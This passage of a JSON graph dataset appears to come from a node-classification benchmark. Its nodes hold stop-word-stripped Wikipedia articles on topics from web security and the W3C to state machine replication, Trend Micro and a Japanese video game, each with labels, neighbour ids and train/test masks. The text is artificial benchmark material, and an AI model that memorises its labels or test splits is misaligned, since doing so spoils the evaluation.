human editors search engines also maintain real-time information running algorithm web crawler internet content capable searched web search engine generally described deep web deep web invisible web hidden web parts world wide web whose contents indexed standard web search engines opposite term deep web surface web accessible anyone using internet computer scientist michael k. bergman credited coining term deep web 2001 search indexing term content deep web hidden behind http forms includes many common uses web mail online banking services users must pay protected paywall video demand online magazines newspapers among others content deep web located accessed direct url ip address may require password security access past public website page web cache server computer located either public internet within enterprise stores recently accessed web pages improve response time users content requested within certain time original request web browsers also implement browser cache writing recently obtained data local data storage device http requests browser may ask data changed since last access web pages resources may contain expiration information control caching secure sensitive data online banking facilitate frequently updated sites news media even sites highly dynamic content may permit basic resources refreshed occasionally web site designers find worthwhile collate resources css data javascript site-wide files cached efficiently enterprise firewalls often cache web resources requested one user benefit many users search engines store cached content frequently accessed websites criminals web become venue spread malware engage range cybercrimes including identity theft fraud espionage intelligence gathering web-based vulnerabilities outnumber traditional computer security concerns measured google one ten web pages may contain malicious code web-based attacks take place legitimate websites measured sophos hosted united states china russia common malware threats sql injection attacks websites html uris web vulnerable attacks like cross-site scripting xss came introduction javascript exacerbated degree web 2.0 ajax web design favours use scripts today one estimate 70 websites open xss attacks users phishing another common threat web february 2013 rsa security division emc estimated global losses phishing 1.5 billion 2012 two well-known phishing methods covert redirect open redirect proposed solutions vary large security companies like mcafee already design governance compliance suites meet post-9/11 regulations like finjan recommended active real-time inspection programming code content regardless source argued enterprises see web security business opportunity rather cost centre others call ubiquitous always-on digital rights management enforced infrastructure replace hundreds companies secure data networks jonathan zittrain said users sharing responsibility computing safety far preferable locking internet every time client requests web page server identify request ip address usually logs also unless set web browsers record requested web pages viewable history feature usually cache much content locally unless server-browser communication uses https encryption web requests responses travel plain text across internet viewed recorded cached intermediate systems another way hide personally identifiable information using vpn vpn encrypts online traffic masks original ip address lowering chance user identification web page asks user supplies personally identifiable information—such real name address e-mail address etc.—web-based entities associate current web traffic individual website uses http cookies username password authentication tracking techniques relate web visits identifiable information provided way possible web-based organisation develop build profile individual people use site sites may able build record individual includes information leisure activities shopping interests profession aspects demographic profile profiles obviously potential interest marketeers advertisers others depending website terms conditions local laws apply information profiles may sold shared passed organisations without user informed many ordinary people means little unexpected e-mails in-box uncannily relevant advertising future web page others mean time spent indulging unusual interest result deluge targeted marketing may unwelcome law enforcement counter terrorism espionage agencies also identify target track individuals based interests proclivities web social networking sites try get users use real names interests locations rather pseudonyms executives believe makes social networking experience engaging users hand uploaded photographs unguarded statements identified individual may regret exposure employers schools parents relatives may influenced aspects social networking profiles text posts digital photos posting individual intend audiences on-line bullies may make use personal information harass stalk users modern social networking websites allow fine grained control privacy settings individual posting complex easy find use especially beginners photographs videos posted onto websites caused particular problems add person face on-line profile modern potential facial recognition technology may possible relate face previously anonymous images events scenarios imaged elsewhere due image caching mirroring copying difficult remove image world wide web web standards include many interdependent standards specifications govern aspects internet world wide web even web-focused standards directly indirectly affect development administration web sites web services considerations include interoperability accessibility usability web pages web sites web standards broader sense consist following web standards fixed sets rules constantly evolving set finalized technical specifications web technologies web standards developed standards organizations—groups interested often competing parties chartered task standardization—not technologies developed declared standard single individual company crucial distinguish specifications development ones already reached final development status case w3c specifications highest maturity level methods accessing web alternative mediums formats facilitate use individuals disabilities disabilities may visual auditory physical speech-related cognitive neurological combination accessibility features also help people temporary disabilities like broken arm ageing users abilities change web receives information well providing information interacting society world wide web consortium claims essential web accessible provide equal access equal opportunity people disabilities tim berners-lee noted power web universality access everyone regardless disability essential aspect many countries regulate web accessibility requirement websites international co-operation w3c web accessibility initiative led simple guidelines web content authors well software developers use make web accessible persons may may using assistive technology w3c internationalisation activity assures web technology works languages scripts cultures beginning 2004 2005 unicode gained ground eventually december 2007 surpassed ascii western european web frequently used character encoding originally allowed resources identified uri subset us-ascii allows characters—any character universal character set—and resource identified iri language",
    "neighbors": [
      4096,
      2057,
      8204,
      8208,
      8212,
      10262,
      4119,
      6171,
      2076,
      10270,
      6193,
      53,
      64,
      2119,
      10313,
      78,
      81,
      6231,
      8281,
      102,
      4198,
      113,
      10355,
      4213,
      6262,
      6264,
      2171,
      124,
      10370,
      8329,
      140,
      8334,
      8335,
      8351,
      10401,
      6307,
      2222,
      6330,
      8386,
      4295,
      6344,
      8392,
      10452,
      4310,
      10460,
      225,
      4326,
      6376,
      2282,
      4331,
      6379,
      242,
      2294,
      247,
      8443,
      10492,
      8446,
      4358,
      6406,
      10506,
      8470,
      10520,
      10521,
      10527,
      2338,
      4391,
      10555,
      2364,
      8515,
      6474,
      4434,
      6486,
      4449,
      4453,
      2411,
      8557,
      10611,
      4472,
      2432,
      8582,
      8584,
      8585,
      4490,
      10636,
      2458,
      421,
      2470,
      2488,
      441,
      444,
      8639,
      448,
      8640,
      6595,
      8644,
      4561,
      467,
      479,
      6629,
      487,
      494,
      8689,
      2552,
      10745,
      8699,
      2558,
      510,
      4609,
      6657,
      8718,
      2575,
      2579,
      534,
      538,
      8735,
      6688,
      545,
      10787,
      8741,
      10791,
      558,
      8751,
      2611,
      4661,
      6714,
      8763,
      10815,
      10831,
      595,
      607,
      4707,
      612,
      6756,
      6758,
      8818,
      4723,
      4725,
      4732,
      637,
      6791,
      8854,
      10909,
      10910,
      2727,
      10924,
      2737,
      8883,
      10938,
      10939,
      4797,
      704,
      705,
      714,
      8914,
      2777,
      8921,
      731,
      8923,
      4837,
      6886,
      4844,
      4847,
      2802,
      4863,
      6929,
      11030,
      4893,
      6941,
      4917,
      9015,
      6975,
      2887,
      845,
      11087,
      4945,
      6993,
      2901,
      4956,
      9055,
      865,
      4962,
      877,
      7022,
      2945,
      899,
      2948,
      9097,
      7053,
      11154,
      5012,
      7078,
      944,
      2994,
      2996,
      5054,
      7108,
      5078,
      9193,
      3052,
      7152,
      11274,
      7179,
      9233,
      9248,
      3110,
      3120,
      7216,
      1083,
      5182,
      1088,
      5186,
      3140,
      11343,
      9296,
      3168,
      1121,
      9314,
      7276,
      9325,
      3182,
      3191,
      9345,
      9358,
      1169,
      7321,
      7324,
      1188,
      3251,
      9397,
      9409,
      7370,
      1240,
      9433,
      7400,
      7406,
      11503,
      5373,
      1295,
      7439,
      11538,
      1302,
      3350,
      5399,
      11559,
      7482,
      7488,
      7490,
      5449,
      7498,
      3404,
      3413,
      1366,
      11607,
      7515,
      5470,
      5472,
      3425,
      3428,
      7533,
      3438,
      5489,
      5492,
      9589,
      1400,
      9595,
      11650,
      3460,
      3462,
      5513,
      5515,
      11659,
      7569,
      7572,
      7576,
      11674,
      7588,
      5549,
      3502,
      1480,
      3529,
      5591,
      7644,
      9702,
      5608,
      5612,
      9710,
      9714,
      7673,
      3578,
      9726,
      5636,
      9736,
      5641,
      1549,
      9744,
      9757,
      7710,
      7713,
      9762,
      7723,
      3629,
      5678,
      5679,
      9780,
      3639,
      9823,
      7780,
      1642,
      5738,
      7787,
      1650,
      3698,
      9843,
      1664,
      7816,
      5789,
      3744,
      9905,
      9908,
      9909,
      1723,
      7871,
      3782,
      9926,
      3785,
      9932,
      7885,
      3795,
      9941,
      3813,
      9967,
      9968,
      7921,
      9971,
      5880,
      7943,
      1802,
      1803,
      7951,
      1812,
      10004,
      1817,
      10012,
      7965,
      3875,
      10020,
      1834,
      10026,
      7980,
      10028,
      5934,
      7983,
      5937,
      7993,
      10057,
      1890,
      3941,
      5996,
      6000,
      6002,
      10102,
      3959,
      8055,
      10110,
      1920,
      3971,
      3979,
      6028,
      10125,
      10126,
      8084,
      1944,
      6045,
      10160,
      1969,
      8122,
      10174,
      6079,
      2003,
      2016,
      4064,
      4068,
      4072,
      8169,
      2033,
      6133,
      6140
    ],
    "mask": "Test"
  },
  {
    "node_id": 120,
    "label": 3,
    "text": "Seikima_II_Akuma_no_Gyakushū!:seikima ii akuma gyakushū 1987 game re-released msx2 title detailed sprites backgrounds also featured actual seikima-ii music game based then-popular japanese heavy metal band formed damian hamada called seikima-ii band lasted creation 1982 dissolution december 31 1999 history prophesied group demons preaching religion order propagate satan use heavy metal member demon different hierarchical class excellency demon kogure leader demons majesty damian hamada crown prince hell accordance prophecy completing world conquest band would disband end century december 12 1999 23:59:59 japan standard time 09:59:99 eastern standard time",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 121,
    "label": 3,
    "text": "State_machine_replication:state machine replication computer science state machine replication state machine approach general method implementing fault-tolerant service replicating servers coordinating client interactions server replicas approach also provides framework understanding designing replication management protocols distributed software often structured terms clients services service comprises one servers exports operations clients invoke making requests although using single centralized server simplest way implement service resulting service fault tolerant processor executing server level fault tolerance unacceptable multiple servers fail independently must used usually replicas single server executed separate processors distributed system protocols used coordinate client interactions replicas physical electrical isolation processors distributed system ensures server failures independent required subsequent discussion state machine defined following tuple values see also mealy machine moore machine state machine begins state labeled start input received passed transition output function produce new state output state held stable new input received output communicated appropriate receiver discussion requires state machine deterministic multiple copies state machine begin start state receiving inputs order arrive state generated outputs state machines implement algorithm driven appropriate input stream including turing-complete algorithms see turing machine typically systems based state machine replication voluntarily restrict implementations use finite-state machines simplify error recovery determinism ideal characteristic providing fault-tolerance intuitively multiple copies system exist fault one would noticeable difference state output others little deduction shows minimum number copies needed fault-tolerance three one fault two others compare state output two copies enough way tell copy faulty one deduction shows three-copy system support one failure must repair replace faulty copy one copies fail three states outputs might differ would way choose correct one general system supports f failures must 2f+1 copies also called replicas extra copies used evidence decide copies correct faulty special cases improve bounds deduction pre-supposes replicas experiencing random independent faults memory errors hard-drive crash failures caused replicas attempt lie deceive collude also handled state machine approach isolated changes failed replicas required stop may continue operating including generating spurious incorrect outputs theoretically failed replica guaranteed stop without generating outputs f+1 replicas required clients may accept first output generated system existing systems achieve limit often used analyzing systems built top fault-tolerant layer since fault-tolerant layer provides fail-stop semantics layers faults replica sends different values different directions instance correct output fellow replicas incorrect outputs others called byzantine failures byzantine failures may random spurious faults malicious intelligent attacks 2f+1 replicas non-cryptographic hashes suffices survive non-malicious byzantine failures high probability malicious attacks require cryptographic primitives achieve 2f+1 using message signatures non-cryptographic techniques applied number replicas must increased 3f+1 preceding intuitive discussion implies simple technique implementing fault-tolerant service terms state machine remainder article develops details technique appendix contains discussion typical extensions used real-world systems logging checkpoints reconfiguration state transfer critical step building distributed system state machines choosing order inputs processed since non-faulty replicas arrive state output given inputs imperative inputs submitted equivalent order replica many solutions proposed literature visible channel communication path two entities actively participating system clients servers hidden channel communication path revealed system example client client channels usually hidden users communicating telephone process writing files disk read another process communication paths visible channels hidden channels exist partial global order causal order may inferred pattern communications causal order may derived independently server inputs state machine may executed causal order guaranteeing consistent state output non-faulty replicas open systems hidden channels common weaker form ordering must used order inputs may defined using voting protocol whose results depend visible channels problem voting single value group independent entities called consensus extension series values may chosen series consensus instances problem becomes difficult participants communication medium may experience failures inputs may ordered position series consensus instances consensus order consensus order may derived independently server inputs state machine may executed consensus order guaranteeing consistent state output non-faulty replicas client requests interpreted inputs state machine processed outputs appropriate order replica generate output independently non-faulty replicas always produce output client response sent faulty outputs must filtered typically majority replicas return output output sent response client permanent unplanned compromise replica called failure proof failure difficult obtain replica may simply slow respond even lie status non-faulty replicas always contain state produce outputs invariant enables failure detection comparing states outputs replicas typically replica state output differs majority replicas declared faulty common implementation pass checksums current replica state recent outputs among servers audit process server restarts local replica deviation detected cryptographic security required checksums possible local server compromised audit process faulty replica continues operate incorrectly case handled safely output filter described previously see sending outputs system failures inputs may discarded processed state machine realistic deployments must compensate transient non-failure behaviors system message loss network partitions slow processors one technique store series inputs log times transient behavior replicas may request copies log entry another replica order fill missing inputs general log required persistent may held memory persistent log may compensate extended transient periods support additional system features checkpoints reconfiguration left unchecked log grow exhausts available storage resources continued operation necessary forget log entries general log entry may forgotten contents longer relevant instance replicas processed input knowledge input longer needed common technique control log size store duplicate state called checkpoint discard log entries contributed checkpoint saves space duplicated state smaller size log checkpoints may added state machine supporting additional input called checkpoint replica maintains checkpoint addition current state value log grows large replica submits checkpoint command like client request system ensure non-faulty replicas process command order log entries checkpoint may discarded system checkpoints requests log entries occurring checkpoint ignored replicas locate copies needed log entry faulty must re-join system see reconfiguration reconfiguration allows replicas added removed system client requests continue processed planned maintenance replica failure common examples reconfiguration reconfiguration involves quitting joining server detects state output faulty see auditing failure detection may selectively exit system likewise administrator may manually execute command remove replica maintenance new input added state machine called quit replica submits command system like client request non-faulty replicas remove quitting replica system upon processing input time replica may ignore protocol messages majority non-faulty replicas remain quit successful system failure quitting failed server may selectively restart re-join system likewise administrator may add new replica group additional capacity new input added state machine called join replica submits command system like client request non-faulty replicas add joining node system upon processing input new replica must up-to-date system state joining see state transfer new replica made available old replica restarted must brought current state processing inputs see joining logically requires applying every input dawn system appropriate order typical deployments short-circuit logical flow performing state transfer recent checkpoint see checkpoints involves directly copying state one replica another using out-of-band protocol checkpoint may large requiring extended transfer period time new inputs may added log occurs new replica must also receive new inputs apply checkpoint received typical deployments add new replica observer ordering protocol beginning state transfer allowing new replica collect inputs period paxos protocol solving consensus may used protocol implementing consensus order paxos requires single leader ensure liveness one replicas must remain leader long enough achieve consensus next operation state machine system behavior unaffected leader changes every instance leader changes multiple times per instance requirement one replica remains leader long enough move system forward paxos multiple replicas may believe leaders time property makes leader election paxos simple algorithm guarantees 'eventual leader work leslie lamport first propose state machine approach seminal 1984 paper using time instead timeout distributed systems fred schneider later elaborated approach paper implementing fault-tolerant services using state machine approach tutorial ken birman developed virtual synchrony model series papers published 1985 1987 primary reference work exploiting virtual synchrony distributed systems describes isis toolkit system used build new york swiss stock exchanges french air traffic control system us navy aegis warship applications recent work miguel castro barbara liskov used state machine approach call practical byzantine fault tolerance architecture replicates especially sensitive services using version lamport original state machine approach optimizations substantially improve performance recently also created bft-smart library high-performance byzantine fault-tolerant state machine replication library developed java library implements protocol similar pbft plus complementary protocols offer state transfer on-the-fly reconfiguration hosts i.e. join leave operations bft-smart recent effort implement state machine replication still actively maintained raft consensus based algorithm developed 2013",
    "neighbors": [
      1669,
      70,
      7499,
      7085,
      7315,
      1049,
      11612
    ],
    "mask": "Test"
  },
  {
    "node_id": 122,
    "label": 5,
    "text": "SwIPe_(protocol):swipe protocol swipe ip security protocol swipe experimental internet protocol ip security protocol specified 1993 operates internet layer internet protocol suite swipe provides confidentiality integrity authentication network traffic used provide end-to-end intermediate-hop security swipe concerned security mechanisms protocol handle policy key management handled outside protocol works augmenting packet cryptographically-strong authenticator and/or encrypting data sent swipe encapsulates ip datagram secured inside swipe packet swipe packet ip packet protocol type 53 swipe packet starts header contains identifying data authentication information header followed original ip datagram turn followed padding required security processing depending negotiated policy sensitive part swipe packet authentication information original ip datagram may encrypted cisco routers switches running ios found vulnerable denial service dos attacks may result processing packets ip protocol 53",
    "neighbors": [
      5472,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 123,
    "label": 7,
    "text": "BioBam_Bioinformatics:biobam bioinformatics biobam bioinformatics software company located valencia spain selling software analysis biological data products used public private research organizations around world firm founded 2011 dr. stefan götz dr. ana conesa managing director biobam dr. stefan götz firm develops provides products functional annotation analysis genomics data sets well-known product blast2go paper describing cited 3528 scientific citations january 2016 blast2go functional genomics specially non-model organism research blast2go functional annotation novel sequences genome-wide analysis annotation data biobam partnerships bioinformatics companies like clc bio biomatters among others",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 124,
    "label": 8,
    "text": "World_Wide_Web_Consortium:world wide web consortium world wide web consortium w3c main international standards organization world wide web abbreviated www w3 founded currently led tim berners-lee consortium made member organizations maintain full-time staff purpose working together development standards world wide web world wide web consortium w3c 444 members w3c also engages education outreach develops software serves open forum discussion web world wide web consortium w3c founded tim berners-lee left european organization nuclear research cern october 1994 founded massachusetts institute technology laboratory computer science mit/lcs support european commission defense advanced research projects agency darpa pioneered arpanet one predecessors internet located technology square 2004 moved csail stata center organization tries foster compatibility agreement among industry members adoption new standards defined w3c incompatible versions html offered different vendors causing inconsistency web pages displayed consortium tries get vendors implement set core principles components chosen consortium originally intended cern host european branch w3c however cern wished focus particle physics information technology april 1995 french institute research computer science automation inria became european host w3c keio university research institute sfc kris becoming asian host september 1996 starting 1997 w3c created regional offices around world september 2009 eighteen world offices covering australia benelux countries netherlands luxembourg belgium brazil china finland germany austria greece hong kong hungary india israel italy south korea morocco south africa spain sweden 2016 united kingdom ireland october 2012 w3c convened community major web players publishers establish mediawiki wiki seeks document open web standards called webplatform webplatform docs january 2013 beihang university became chinese host sometimes specification becomes large split independent modules mature pace subsequent editions module specification known levels denoted first integer title e.g css3 level 3 subsequent revisions level denoted integer following decimal point e.g css2.1 revision 1 w3c standard formation process defined within w3c process document outlining four maturity levels new standard recommendation must progress enough content gathered 'editor drafts discussion may published working draft wd review community wd document first form standard publicly available commentary virtually anyone accepted though promises made regard action particular element commented upon stage standard document may significant differences final form anyone implements wd standards ready significantly modify implementations standard matures candidate recommendation version standard mature wd point group responsible standard satisfied standard meets goal purpose cr elicit aid development community implementable standard standard document may change point significant features mostly decided design features still change due feedback implementors proposed recommendation version standard passed prior two levels users standard provide input stage document submitted w3c advisory council final approval step important rarely causes significant changes standard passes next phase mature stage development point standard undergone extensive review testing theoretical practical conditions standard endorsed w3c indicating readiness deployment public encouraging widespread support among implementors authors recommendations sometimes implemented incorrectly partially many standards define two levels conformance developers must follow wish label product w3c-compliant recommendation may updated extended separately-published non-technical errata editor drafts sufficient substantial edits accumulate producing new edition level recommendation additionally w3c publishes various kinds informative notes used references unlike isoc international standards bodies w3c certification program w3c decided suitable start program owing risk creating drawbacks community benefits consortium jointly administered mit computer science artificial intelligence laboratory csail located stata center united states european research consortium informatics mathematics ercim sophia antipolis france keio university japan beihang university china w3c also world offices eighteen regions around world w3c offices work regional web communities promote w3c technologies local languages broaden w3c geographical base encourage international participation w3c activities w3c staff team 70–80 worldwide w3c run management team allocates resources designs strategy led ceo jeffrey jaffe march 2010 former cto novell also includes advisory board supports strategy legal matters helps resolve conflicts majority standardization work done external experts w3c various working groups consortium governed membership list members available public members include businesses nonprofit organizations universities governmental entities individuals membership requirements transparent except one requirement application membership must reviewed approved w3c many guidelines requirements stated detail final guideline process standards membership might finally approved denied cost membership given sliding scale depending character organization applying country located countries categorized world bank recent grouping gni gross national income per capita 2012 2013 w3c started considering adding drm-specific encrypted media extensions eme html5 criticised openness interoperability vendor neutrality distinguished websites built using w3c standards requiring proprietary plug-ins like flash september 18 2017 w3c published eme specification recommendation leading electronic frontier foundation resignation w3c w3c/ietf standards internet protocol suite",
    "neighbors": [
      6657,
      5641,
      523,
      9229,
      1556,
      2581,
      534,
      1054,
      6688,
      10791,
      7212,
      10284,
      4658,
      53,
      10808,
      8762,
      9275,
      9786,
      2139,
      5724,
      1631,
      4707,
      7784,
      9834,
      9841,
      4213,
      6775,
      119,
      6777,
      4732,
      124,
      7806,
      7822,
      10910,
      4768,
      2725,
      6316,
      6319,
      7346,
      4797,
      2757,
      1223,
      3271,
      11466,
      10450,
      10452,
      10453,
      4310,
      5849,
      8923,
      6366,
      225,
      8941,
      7407,
      9967,
      10486,
      2296,
      8451,
      7943,
      1802,
      10506,
      5907,
      4893,
      5918,
      7455,
      6948,
      10020,
      6951,
      10026,
      3389,
      9029,
      3920,
      8021,
      10071,
      9561,
      11098,
      865,
      10611,
      2945,
      11650,
      3462,
      8070,
      5515,
      11659,
      6034,
      11154,
      5012,
      1944,
      5531,
      7067,
      417,
      7592,
      432,
      2485,
      1468,
      8644,
      11223,
      5593,
      5597,
      479,
      4064,
      6629,
      487,
      11240,
      3052,
      8689,
      502,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 125,
    "label": 2,
    "text": "Trusted_operating_system:trusted operating system trusted operating system tos generally refers operating system provides sufficient support multilevel security evidence correctness meet particular set government requirements common set criteria trusted operating system design common criteria combined security functional requirements sfrs labeled security protection profile lspp mandatory access control mac common criteria result multi-year effort governments u.s. canada united kingdom france germany netherlands countries develop harmonized security criteria products examples certified trusted operating systems examples operating systems might certifiable companies created trusted operating systems include",
    "neighbors": [
      5384,
      1304,
      5280,
      9635,
      9897,
      9646,
      7983,
      11184,
      7217,
      1458,
      823,
      10170,
      9665,
      10051,
      8904,
      6734,
      9817,
      1634,
      11109,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 126,
    "label": 3,
    "text": "Madō_Monogatari:madō monogatari madō monogatari series first-person dungeon crawler rpgs compile first game released 1990 msx2 sega published game gear remakes based 1-2-3 characters series would later used puzzle game puyo puyo gameplay combines traditional rpg unique twists example numeric stats instead everything represented character facial expressions sprites another complete lack physical attacks everything utilizes one four magical elements fire ice storm thunder bayoen enemies weaker one particular magic attack another",
    "neighbors": [
      1753,
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 127,
    "label": 4,
    "text": "Trend_Micro:trend micro founder eva chen serves trend micro chief executive officer position held since 2005 succeeded founding ceo steve chang serves chairman company founded 1988 los angeles steve chang 張明正 chang ming-cheng wife jenny chang sister eva chen 陳怡樺 company established proceeds steve chang previous sale copy protection dongle united states-based rainbow technologies shortly establishing company founders moved headquarters taipei 1992 trend micro took japanese software firm form trend micro devices established headquarters japan made agreement cpu maker intel produced anti-virus product local area networks lans sale intel brand intel paid royalties trend micro sales landesk virus protect united states europe trend paid royalties intel sales asia 1993 novell began bundling product network operating system 1996 two companies agreed two-year continuation agreement trend allowed globally market serverprotect product brand alongside intel landesk brand trend micro listed tokyo stock exchange 1998 ticker 4704 company began trading united states-based nasdaq stock exchange july 1999 2004 founding chief executive officer steve chang decided split responsibilities ceo chairman company company co-founder eva chen succeeded steve chang chief executive officer trend micro january 2005 chen recently served company chief technology officer since 1996 executive vice president since company founding october 1989 steve chang retained position company chairman may trend micro acquired braintree massachusetts-based antispyware company intermute 15 million trend micro fully integrated intermute spysubtract antispyware program antispyware product offerings end year june 2005 trend micro acquired kelkea san jose california-based developer antispam software kelkea developed mail abuse prevention system maps ip filtering software allowed internet service providers block spam phishing scams kelkea chief executive officer dave rand retained trend micro chief technologist content security march 2007 trend micro acquired freeware antispyware program hijackthis creator merijn bellekom undisclosed sum trend micro delisted depository shares nasdaq stock exchange may later year october trend micro acquired mountain view california-based data loss prevention software developer provilla provilla creator leakproof software allowed companies block transmission sensitive data warn security managers transmission attempts trend micro acquired identum february 2008 undisclosed sum identum founded later spun-off university bristol cryptography department developed id-based email encryption software identum chairman serial entrepreneur steve purdham two companies originally talks trend micro license identum technology trend micro later decided purchase firm outright identum renamed trend micro bristol encryption technology integrated existing trend micro products existing identum products continued sold trend micro brand also year trend micro sued barracuda networks latter distribution clamav part security package trend micro claimed barracuda use clamav infringed software patent owned trend micro filtering viruses internet gateway 19 may 2011 u.s. patent trademark office issued final rejection reexamination trend micro u.s. patent 5,623,600 april 2009 trend micro acquired ottawa ontario canada-based third brigade undisclosed sum third brigade developed host-based intrusion prevention firewall software used trend micro trend officescan anti-malware suite two years prior acquiring third brigade third brigade reincorporated trend micro canada technologies trend micro acquired leeds england based humyo june 2010 undisclosed sum humyo provided cloud-based data storage synchronization services small businesses individuals later year november trend micro acquired mobile armor mobile armor developer full disk file folder removable media encryption mobile devices trend micro integrated company technology centrally-managed platform mobile device security june 2012 trend micro acquired marlborough massachusetts-based secure sockets layer ssl certificate provider affirmtrust undisclosed sum trend micro followed another acquisition taiwanese advanced network-security firm broadweb october 2012 broadweb developer deep packet inspection technology ability block malicious data packets real-time technology integrated trend micro custom defense solution suite designed provide network-wide visibility protection advanced attacks threats trend micro relocated us headquarters las colinas area irving texas september 2013 relocation allowed company consolidate operations previously housed cupertino california arlington texas september 2014 trend micro began partnership interpol wherein trend micro shared international police organization information cybercrime threats via company threat intelligence service according interpol information helped international police organization 190 member countries decrease cybercrime global scale trend micro also provided cybercrime investigation training program interpol also 2014 trend micro expanded cloud app security protect microsoft office 365 threats caught native microsoft security 2016 cloud app security software expanded cover box dropbox google drive october 2015 trend micro reached agreement buy tippingpoint network software security developer hp inc. 300 million included bug bounty program zero day initiative incorporated trend micro research ’ focus existing threats vulnerabilities future potential security issues year trend micro certified vce validation ready solution vblock ready vce technology alliance partner program later trend micro joined vce select program allowed trend micro deep security bundled vce converged hyper-converged infrastructure systems gartner named trend micro leaders ranking magic quadrant rating endpoint protection platforms 2015 2016 2017 2016 trend micro discovered variant virus affecting android phones able infect smart tvs trend announced launch 100 million venture capital investment fund june 2017 focused next generation technology including internet things iot september 2017 trend micro awarded reimbursement u.s. district court portion legal fees incurred rejected patent claims filed intellectual ventures company subsequently launched trend forward capital venture initial investments included business-to-business payment company veem wearable device company muse telemetry company mojio brain health technology company interaxon november 2017 trend micro acquired immunio adding new capabilities hybrid cloud security fit neatly devops life cycle immunio introduced early detection protection application vulnerabilities container image scanning allowing publishing protection secure container images december 2017 trend partnered telco systems develop virtual network cybersecurity platform combining trend virtual network function suite telco nfvtime software april 2018 trend micro joined cybersecurity tech accord public agreement companies defend customers malicious attacks cybercriminal gangs nation states august 2018 researchers discovered several trend micro consumer products macos capturing browser history data including passwords sending remote server initial analysis designed enhance security products identified dr. cleaner dr. cleaner pro dr. antivirus dr. unarchiver dr battery duplicate finder open file consequence apple removed trend micro products mac app store trend micro admitted products captured uploaded data also apologized community concern might felt went excuse activity humbly result use common code libraries event appropriation users data explicitly disclosed applicable eulas august 2018 trend micro announced fourth annual capture flag ctf competition invites teams around world demonstrate skills challenge knowledge today ’ critical areas cybersecurity protection september 2018 trend micro hitrust announced partnership launch new center provides advanced cyber risk management november 2018 trend micro moxa inc. announced formation joint-venture corporation—txone networks—which focus security needs present industrial internet things iot environments june 2008 trend micro introduced trend micro smart protection network cloud-client content security infrastructure delivers global threat intelligence protect customers online threats data stealing malware phishing attacks web email mobile threats 2012 trend micro added big data analytics smart protection network big data analytics allow network use behavioral-based identification methods identify new security threats network also combines in-the-cloud technologies client-based antivirus technologies reduce dependency conventional pattern file downloads endpoint threat information trend micro smart protection network deployed real time company security software portfolio trend micro report eu general data protection regulation showed increase extortion attempts organizations try comply eu privacy laws trend micro receives threat intelligence trendlabs company research development support center trendlabs ten labs worldwide headquartered philippines employs 1,200 security experts engineers company singapore-based lab provides malware forensics analysis february 2018 trend micro partnered panasonic build secure systems electronic control units automated cars april 2018 company released tool helps identify individual writing styles combat email fraud",
    "neighbors": [
      2049,
      9221,
      10245,
      6153,
      9746,
      8212,
      1052,
      550,
      2601,
      6699,
      11313,
      10308,
      7248,
      7251,
      2134,
      2654,
      3581,
      4194,
      9832,
      1650,
      10872,
      9341,
      7809,
      131,
      7306,
      11407,
      10385,
      10392,
      156,
      2721,
      8355,
      2213,
      9894,
      6823,
      3243,
      10417,
      6834,
      186,
      704,
      7362,
      8900,
      202,
      4813,
      11476,
      1242,
      6372,
      6382,
      7413,
      3320,
      9983,
      5891,
      9488,
      4374,
      6431,
      5924,
      1318,
      8998,
      2859,
      2865,
      4403,
      9523,
      3382,
      9537,
      3395,
      4421,
      1355,
      10574,
      8024,
      2907,
      9055,
      11104,
      9569,
      11622,
      4464,
      3955,
      5491,
      2425,
      10110,
      9600,
      10116,
      1925,
      1417,
      7563,
      3981,
      9102,
      1935,
      10637,
      9630,
      11166,
      5024,
      5540,
      8614,
      8615,
      2472,
      4013,
      9137,
      1970,
      10166,
      7103,
      1472,
      1994,
      6091,
      5069,
      10708,
      2005,
      11225,
      8668,
      11233,
      9713,
      6643,
      10745,
      4605
    ],
    "mask": "Validation"
  },
  {
    "node_id": 128,
    "label": 4,
    "text": "Datafly_algorithm:datafly algorithm datafly algorithm algorithm providing anonymity medical data algorithm developed latanya arvette sweeney 1997−98 anonymization achieved automatically generalizing substituting inserting removing information appropriate without losing many details found within data method used on-the-fly role-based security within institution batch mode exporting data institution organizations release receive medical data explicit identifiers -- name -- removed erroneous belief patient confidentiality maintained resulting data look anonymous however remaining data used re-identify individuals linking matching data databases looking unique characteristics found fields records database datafly algorithm criticized trying achieve anonymization over-generalization algorithm selects attribute greatest number distinct values one generalize first outline datafly algorithm presented input private table pt quasi-identifier qi ... k -anonymity constraint k domain generalization hierarchies dgh 1 ... n accompanying functions f loss limit percentage tuples suppressed pt id set unique identifiers keys tuple output mgt generalization pt qi enforces k -anonymity assumes pt ≤ k loss pt k algorithm datafly // construct frequency list containing unique sequences values across quasi-identifier pt // along number occurrences sequence",
    "neighbors": [
      10737,
      210,
      9075,
      2901,
      3767,
      2936
    ],
    "mask": "Test"
  },
  {
    "node_id": 129,
    "label": 7,
    "text": "Compile_farm:compile farm compile farm server farm collection one servers set compile computer programs remotely various reasons uses compile farm include one example compile farm service provided sourceforge 2006 sourceforge compile farm composed twelve machines various computer architectures running variety operating systems intended allow developers test use programs variety platforms releasing public power spike destroyed several machines became non-operational time 2006 officially discontinued february 2007 examples",
    "neighbors": [
      1952,
      9932,
      5612,
      7983,
      5819
    ],
    "mask": "Train"
  },
  {
    "node_id": 130,
    "label": 4,
    "text": "HERAS-AF:heras-af heras well established open-source xacml 2.0 implementation provides extended implementation xacml 2.0 standard freely available established based future driven technologies standards",
    "neighbors": [
      5612,
      5677,
      7983,
      5404,
      2013
    ],
    "mask": "None"
  },
  {
    "node_id": 131,
    "label": 4,
